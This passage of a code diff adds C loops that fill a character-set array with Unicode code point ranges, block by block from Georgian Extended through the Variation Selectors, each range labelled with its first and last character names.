+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
